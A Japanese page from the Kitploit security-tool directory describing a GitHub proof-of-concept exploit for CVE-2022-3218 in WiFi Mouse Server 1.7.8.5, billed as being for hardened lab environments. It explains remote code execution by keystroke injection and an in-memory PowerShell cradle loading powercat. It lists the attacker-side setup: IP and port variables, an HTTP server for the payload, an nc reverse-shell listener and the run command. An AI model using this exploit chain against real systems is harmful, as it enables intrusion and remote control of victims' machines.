Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
MouseServer-1.7.8.5-RCE — CVE-2022-3218を対象としたPoCエクスプロイト。WiFi Mouse Server 1.7.8.5を標的とし、キーストロークインジェクションとインメモリPowerShellペイロード配信によりRCEを達成します。堅牢化されたラボ環境向けです。 | Kitploit
ツール/GitHubGitHub/mermehr/mouseserver-1.7.8.5-rce
脆弱性分析エクスプロイトペネトレーションテストレッドチーミングペイロード開発
GitHubmermehr/mouseserver-1.7.8.5-rce

MouseServer-1.7.8.5-RCE

CVE-2022-3218を対象としたPoCエクスプロイト。WiFi Mouse Server 1.7.8.5を標的とし、キーストロークインジェクションとインメモリPowerShellペイロード配信によりRCEを達成します。堅牢化されたラボ環境向けです。

リポジトリを見る
5日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

WiFi Mouse Server 1.7.8.5 - RCE

WiFi Mouse Server v1.7.8.5 向けに最適化された Python 3 の概念実証(PoC)エクスプロイトです。このスクリプトは、プロトコル固有の脆弱性を利用し、自動化されたキーストローク注入によってリモートコード実行(RCE)を実現します。

このバージョンは、ホストの堅牢化制約(certutil.exe の実行制限やバイナリのダウンロードブロックなど)により従来の公開エクスプロイトが失敗するラボ環境向けに、明示的に修正・調整されています。

背景とクレジット

  • 歴史的には、CVE-2022-3218 などのコミュニティ発見とともに追跡されています。
  • RedHatAugust による元の公開エクスプロイト(Exploit-DB #49601)に強く触発され、それを改変したものです。
  • 元の Exploit-DB スクリプトは、cmd.exe と certutil.exe に依存して、悪意のある実行ファイルをディスクに配置します。堅牢化された、または現代の試験・ラボ環境では、これらの LOLBins はローカルグループポリシーによって制限またはブロックされることがよくあります。この修正版では、powercat.ps1 を使用した PowerShell Web クレードルを介して、攻撃ベクトルを完全にメモリ上へ移行します。

使用方法

ペイロードの設定(スクリプト内)

スクリプトを開き、ファイル先頭の設定変数をローカル環境の設定に合わせて更新してください:

root@kitploit:~
rhost = sys.argv[1]
lhost = "192.168.45.167"  # Your Attacker/Kali IP
lport = "443"             # Your Netcat Listener Port
http_port = "80"          # Your local HTTP Server Port hosting powercat

ホストリスナーのセットアップ

ローカルの攻撃機のディレクトリ内で powercat.ps1 をホストしてください:

root@kitploit:~
python3 -m http.server 80

別のターミナルタブで、設定した lport へのリバースシェルリスナーを起動してください:

root@kitploit:~
nc -lvnp 443

エクスプロイトの実行

ターゲットマシンの IP アドレスに対してスクリプトを実行してください:

root@kitploit:~
python3 exploit.py <TARGET-IP>
ツールをダウンロード